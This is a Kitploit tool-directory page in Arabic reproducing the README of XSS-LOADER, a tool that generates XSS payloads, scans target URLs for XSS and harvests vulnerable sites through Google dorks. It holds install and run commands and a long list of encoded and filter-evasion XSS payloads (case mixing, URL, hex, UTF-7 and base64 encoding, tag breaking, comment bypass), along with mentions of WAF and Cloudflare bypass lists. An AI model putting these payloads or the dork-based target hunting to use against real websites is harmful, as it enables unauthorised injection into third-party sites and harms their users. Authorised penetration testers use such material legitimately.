Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
XSS-LOADER — مولد حمولة Xss ~ ماسح Xss ~ باحث دورك Xss | Kitploit
أدوات/GitHubGitHub/capture0x/xss-loader
ماسحات الثغرات الأمنية للويبتوليد الحمولةاستغلال تطبيقات الويبتجاوز WAFاختبار الاختراق
GitHubcapture0x/xss-loader

XSS-LOADER

مولد حمولة Xss ~ ماسح Xss ~ باحث دورك Xss

عرض المستودع
621123منذ 3 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

💎   أدوات XSS-LOADER   💎

كتب بواسطة TMRSWRR

الإصدار 1.0.0

أداة شاملة لـ XSS PAYLOAD GENERATOR - XSS SCANNER - XSS DORK FINDER

إنستغرام: TMRSWRR

📷 لقطات الشاشة 📷

👇 💌 كيفية الاستخدام 💌 👇

كيفية الاستخدام

📒 اقرأني 📒

  • تخلق هذه الأداة حمولة لاستخدامها في حقن XSS
  • اختر علامات الحمولة الافتراضية من المعامل أو اكتب حمولتك
  • تقوم بحقن XSS باستخدام معامل ماسح XSS
  • تجد عناوين URL للمواقع الضعيفة باستخدام معامل باحث دورك XSS

💿 التثبيت 💿

التثبيت باستخدام ملف requirements.txt

root@kitploit:~
git clone https://github.com/capture0x/XSS-LOADER/
cd XSS-LOADER
pip3 install -r requirements.txt

الاستخدام

root@kitploit:~
python3 payloader.py

🗃️ الميزات 🗃️

*الحمولة الأساسية

تعيين المعامل الافتراضي إلى :<script>alert(1)</script>

*حمولة Div

تعيين المعامل الافتراضي إلى :<div onpointerover='alert(1)'>MOVE HERE</div

*حمولة Img

تعيين المعامل الافتراضي إلى :``````

*حمولة Body

تعيين المعامل الافتراضي إلى :<body ontouchstart=alert(1)>

*حمولة Svg

تعيين المعامل الافتراضي إلى :<svg onload=alert('1')>

*أدخل حمولتك

يقوم بتشفير الحمولة التي كتبها المستخدم

*معامل مولد الحمولة

يقوم بتشفير الحمولة على العلامة المحددة

root@kitploit:~
* |   1.  حالة الأحرف الكبيرة---->  <SCRIPT>ALERT(1)</SCRIPT>              
* |   2.  حالة أحرف كبيرة وصغيرة----> <ScRiPt>aleRt(1)</ScRiPt>   
* |   3.  تشفير URL ----->   %3Cscript%3Ealert%281%29%3C%2Fscript%3E           
* |   4.  تشفير كيان HTML----->  &lt;script&gt;alert(1)&lt;/script&gt; 
* |   5.  تقسيم الحمولة ----->  <scri</script>pt>>alert(1)</scri</script>pt>>       
* |   6.  تشفير HEX ----->  3c7363726970743e616c6572742831293c2f7363726970743e       
* |   7.  تشفير UTF-16 -----> تحويل الحمولة إلى تنسيق utf-16.   
* |   8.  تشفير UTF-32----->  تحويل الحمولة إلى تنسيق utf-32.          
* |   9.  حذف العلامة -----> ";alert('XSS');//            
* |  10.  تشفير يونيكود----->    %uff1cscript%uff1ealert(1)%uff1c/script%uff1e         
* |  11.  تشفير US-ASCII ----->  ¼script¾alert(1)¼/script¾      
* |  12.  تشفير BASE64 ----->   PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==          
* |  13.  تشفير UTF-7 ----->   +ADw-script+AD4-alert(1)+ADw-/script+AD4-           
* |  14.  تجاوز الأقواس ----->  <script>alert`1`</script>   
* |  15.  تشفير UTF-8 ----->  %C0%BCscript%C0%BEalert%CA%B91)%C0%BC/script%C0%BE          
* |  16.  اختراق كتلة العلامة-----> "><script>alert(1)</script>
* |  17.  اختراق السكريبت----->  </script><script>alert(1)</script>
* |  18.  حمولة رفع الملف-----> "><script>alert(1)</script>.gif
* |  19.  تجاوز داخل التعليقات-----> <!--><script>alert(1)</script>-->
* |  20.  حمولة التحوير-----> <noscript><p title="</noscript><script>alert(1)</script>">
* |  21.  صورة مشوهة-----> <script>alert(1)</script>">
* |  22.  تجاوز المسافة-----> 
* |  23.  كتلة مخفية منخفضة المستوى-----> <!--[if gte IE 4]><script>alert(1)</script><![endif]-->
* |  24.  حمولات تجاوز جدار الحماية-----> عرض قائمة حمولات تجاوز WAF
* |  25.  حمولات تجاوز Cloudflare-----> عرض قائمة حمولات تجاوز Cloudflare
* |  26.  حمولات متعددة اللغات-----> عرض قائمة حمولات Polyglot
* |  27.  حمولات التنبيه-----> عرض قائمة حمولات التنبيه
* |  28.  إنشاء جميع الحمولات-----> عرض إنشاء جميع الحمولات
* |  29.  العودة إلى القائمة الرئيسية
* |  30.  خروج

*ماسح XSS

بداية ستحتاج إلى إدخال عنوان URL للهدف يرجى إدخال عنوان URL بهذا الشكل مثال==>مثلاً الهدف -----> http://target.com/index.php?name= مختار لفحص قائمة الحمولات

  • قائمة الحمولات الأساسية ==> قائمة حمولات تتكون من علامة script
  • قائمة حمولات Div ==> قائمة حمولات تتكون من علامة div
  • قائمة حمولات Img ==> قائمة حمولات تتكون من علامة img
  • قائمة حمولات Body ==> قائمة حمولات تتكون من علامة body
  • قائمة حمولات Svg ==> قائمة حمولات تتكون من علامة svg
  • قائمة الحمولات المختلطة ==> قائمة حمولات تتكون من جميع العلامات
  • إدخال مسار الملف ==> قائمة حمولات يحددها المستخدم، يرجى إدخال عنوان URL بهذا المثال..! (مثال path -----> /usr/share/wordlists/wfuzz/Injections/XSS.txt)

ستتم إضافة النتائج إلى "vulnpayload.txt" بعد الفحص.

*باحث دورك XSS

أولاً أدخل الدورك للبحث: مثال---->inurl:"search.php?q=" سيتم حفظ النتائج في "dork.txt" بعد الفحص.

المشكلات المعروفة

تم الإصلاح:

  • أخطاء يونيكود

  • أخطاء الوحدة

هام:

إذا كنت ترغب في استخدام الأداة لـ python3 المثبتة على ويندوز، قم بتنزيل الرابط أدناه:

https://github.com/capture0x/XSS-LOADER-for-WINDOWS

الأخطاء والتحسينات

للتقارير عن الأخطاء أو التحسينات، يرجى فتح مشكلة هنا.

حقوق النشر 2020

تنزيل الأداة